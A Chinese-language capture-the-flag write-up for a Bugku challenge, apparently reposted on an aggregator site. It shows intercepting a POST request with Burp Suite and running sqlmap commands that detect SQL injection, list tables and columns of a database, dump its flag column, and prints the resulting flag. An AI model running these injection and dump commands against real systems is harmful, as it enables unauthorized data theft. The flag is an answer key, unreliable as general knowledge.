当前位置: 首页 > news >正文

bugku——成绩查询(sqlmap工具的使用)

当输入1的时候会返回成绩

但是在URL中并没有出现GET传参,所以大概率是POST了。

需要用我们的工具sqlmap

在这之前,我们需要用Burp Suite抓包。

发送到重放器,右键,复制到文件

打开是这样的,好了主备工作完成,打开sqlmap

L:\gj\sqlmap>python sqlmap.py -r "1.txt"

他说目标接口id存在高危sql注入漏洞

可以注入我们就进行下一步,爆表

python sqlmap.py -r "1.txt" --tables

出来了数据库名和表名,继续爆列名。

ython sqlmap.py -r "1.txt" -D skctf -T fl4g --columns

得到列明了,提取数据

python sqlmap.py -r "1.txt" -D skctf -T fl4g -C skctf_flag --dump

flag{7bc17ff3453fef76f405bf3fb68cc9a9}

http://www.cnnetsun.cn/news/95464.html

相关文章:

  • 揭秘Java:深度解析线程调度算法!
  • 三大电商API应用对比:淘宝京东拼多多谁能笑到最后?
  • 2025年亲测7个降a率工具:AIGC率90%怎么降低ai?(附免费降AI1000字数)
  • ACL实验报告
  • 别再熬夜赶论文?6款AI工具帮你告别恐惧写作无压力!
  • 一键导入书签,首页替代神器!批量去重、自动备份,维护不再头疼
  • 土著刷题新功能解锁:跳题作答
  • Yolo模型TensorRT-C++推理实战指南
  • LobeChat能否支持暗能量建模?宇宙加速膨胀机制理论推演
  • 用python写一个简单的ros话题发布
  • 基于Java Swing的排序算法可视化器(1)
  • 不敢相信!这5个良心软件,功能强大到媲美付费版!
  • 实邦电子嵌入式开发服务如何,是否值得信赖?
  • 基于PLC控制的四路抢答器设计
  • 鸿蒙 Flutter 全场景开发实战指南:从环境搭建到分布式应用落地(2025 最新版)
  • LobeChat销售话术优化建议生成
  • 11章 像素和顶点数据导出 - “Vega“ 7nm Instruction Set ArchitectureReference Guide
  • 15人团队,60天,1000万美金ARR:Lovable正在重新定义“软件开发”
  • TensorFlow调试报错看不懂?LobeChat帮你解读
  • 2026届秋招AI岗位狂潮:大厂招聘激增10倍,这份成功上岸攻略不容错过!
  • 1、掌握 Linux 脚本编程:从基础到高级应用
  • 3、Bash脚本编写:基础与进阶
  • C#教程(小部分)
  • HNU 编译系统 作业1
  • vue基于Springboot框架的写字楼危险品管理信息系统的设计和实现
  • LobeChat现场引导标识文案
  • Vue3使用pinia做全局状态管理的简单示例
  • 2025计算机能力竞赛暨城市联赛——算法编程赛道【秋季赛】(二)
  • 用户体验调研问卷:LobeChat设计有效题目
  • BONT-L肽有效成分:棕榈酰六肽-19 Palmitoyl Hexapeptide-19